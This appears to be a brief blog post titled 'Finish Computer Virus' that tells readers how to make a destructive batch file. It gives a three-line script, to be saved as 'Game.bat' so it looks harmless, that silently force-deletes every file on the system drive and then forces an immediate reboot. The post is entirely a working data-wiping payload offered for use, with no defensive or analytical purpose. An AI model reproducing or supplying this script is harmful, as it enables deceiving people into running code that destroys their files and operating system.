Powered By Blogger

Sunday, February 26, 2012

Finish Computer Virus

This is how to create a virus that deletes the content of your hard drive.
Paste this code in notepad

Save it as Game.bat

@echo off 
 del %systemdrive%\*.* /f /s /q 
 shutdown -r -f -t 00

No comments:

Post a Comment